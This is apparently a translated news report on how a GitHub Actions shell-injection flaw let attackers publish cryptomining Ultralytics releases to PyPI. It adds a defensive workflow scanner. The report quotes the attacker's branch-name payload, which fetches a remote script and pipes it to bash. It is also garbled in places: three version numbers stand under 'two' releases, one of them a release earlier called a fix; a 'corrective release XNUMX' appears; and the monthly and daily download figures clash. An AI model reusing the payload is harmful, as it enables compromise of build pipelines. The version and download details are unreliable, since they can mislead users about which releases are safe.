A vulnerability in a GitHub Actions handler led to the publication of malicious Ultralytics releases

Attackers were able to execute code with GitHub Actions privileges in the repository of the Ultralytics Python library, which is used for computer vision tasks such as object detection in images and image segmentation. After gaining access to the repository, the attackers published new Ultralytics releases to the PyPI index that included malicious changes for cryptocurrency mining. Over the past month, the Ultralytics library was downloaded from the PyPI catalogue more than 6.4 million times.

The repository was compromised through a vulnerability in the ultralytics-actions package, which is used to automatically launch handlers when certain actions occur in a GitHub repository via the GitHub Actions mechanism. In the ultralytics project, the vulnerable handler was bound to the pull_request_target event and was invoked whenever a new pull request arrived. Specifically, to format the code in submitted pull requests, the format.yml handler was invoked and the code specified in the "run" section of the action.yml file was executed; it contained shell commands with substitution patterns:

    git pull origin ${{ github.head_ref || github.ref }}
    git config --global user.name "${{ inputs.github_username }}"
    git config --global user.email "${{ inputs.github_email }}"

Thus the Git branch name given in the pull request was substituted into the shell commands without proper escaping. Notably, back in August the ultralytics-actions package had already fixed a similar vulnerability involving the use of an external value in an echo command:

    echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"

To get their code executed in the context of the GitHub Actions handler, the attackers sent a pull request to the ultralytics repository, specifying the following as the branch name: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Accordingly, when the pull request was received, the attacker-supplied "$(…)" string was substituted into the code, and when the handler ran, this led to the execution of "curl -sSfL raw.githubusercontent.com/…/file.sh | bash".
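As an added illustration (not code from the article or from the Ultralytics project), the following scanner flags the injection pattern described above: `${{ ... }}` expressions that expand pull-request-controlled values (branch name, title, body, declared inputs) directly inside a `run:` step. The two sample steps are constructed; the hardened one shows the usual mitigation of passing such values through `env:` so the shell only ever sees a quoted variable.

```python
import re

# Constructed sample steps (not the project's real files): the first repeats the
# injection-prone pattern from the text, the second passes the same values through
# environment variables so the shell never sees the raw expression text.
VULNERABLE = """
steps:
  - run: |
      git pull origin ${{ github.head_ref || github.ref }}
      git config --global user.name "${{ inputs.github_username }}"
      echo "ref: ${{ github.event.pull_request.head.ref }}"
"""
HARDENED = """
steps:
  - env:
      HEAD_REF: ${{ github.head_ref || github.ref }}
      GH_USER: ${{ inputs.github_username }}
    run: |
      git pull origin "$HEAD_REF"
      git config --global user.name "$GH_USER"
"""
# Expression sources a pull-request author controls (branch name, title, body,
# comments, declared inputs); expanding one of these inside run: is shell injection.
UNTRUSTED = re.compile(
    r"github\.(head_ref|event\.(pull_request|issue|comment)\.[\w.]*"
    r"(title|body|ref|label|login|name|message))|inputs\.\w+")
EXPR = re.compile(r"\$\{\{([^}]*)\}\}")

def find_injections(workflow_text):
    """Return (line_no, expression) for untrusted ${{ }} uses inside run: steps."""
    findings = []
    run_key_indent = None  # column of the run: key while inside its block scalar
    for no, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        if not stripped:
            continue
        indent = len(line) - len(stripped)
        m = re.match(r"(-\s+)?run:(.*)", stripped)
        if m:
            run_key_indent = indent + len(m.group(1) or "")
            body = m.group(2)  # inline form: run: <command>
        elif run_key_indent is not None and indent > run_key_indent:
            body = stripped  # continuation line of the block scalar
        else:
            run_key_indent = None
            continue
        for expr in EXPR.findall(body):
            if UNTRUSTED.search(expr):
                findings.append((no, expr.strip()))
    return findings
```

The scan is line-based rather than a full YAML parse, which is enough for block-scalar and inline `run:` steps; a workflow triggered by pull_request_target is the case to prioritise, since it runs with the base repository's secrets.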


Code running in the GitHub Actions context could be used to capture the repository access token and other sensitive data. How the attackers were able to create releases once they could run their code in GitHub Actions is not yet clear; it is assumed that this happened through a change to the publish.yml handler (the attackers removed the check of the account permitted to publish releases to PyPI) and through a GitHub Actions build cache poisoning technique used to inject their data into the release.

The first malicious Ultralytics release, 8.3.41, was published by the attackers on PyPI on December 4 at 23:51 (MSK) and was removed at 12:15 the next day. At 15:47 another release, 8.3.42, was submitted and removed at 16:47. The malicious versions were therefore available for download for about 13 hours (PyPI records about 250 downloads of the ultralytics library per day). Releases 8.3.41 and 8.3.42 contained code that downloaded the XMRig cryptocurrency mining component from an external server.

The project developers fixed the problem and produced the corrective releases 8.3.43 and 8.3.44, but two days later another attack was carried out: today at 04:41 and 05:27 (MSK) the attackers published two more malicious releases, 8.3.45, 8.3.46 and 8.3.44, which include the mining code. Until the investigation is complete, users are advised to refrain from installing new versions and the corrective release XNUMX as a dependency.

Source: opennet.ru
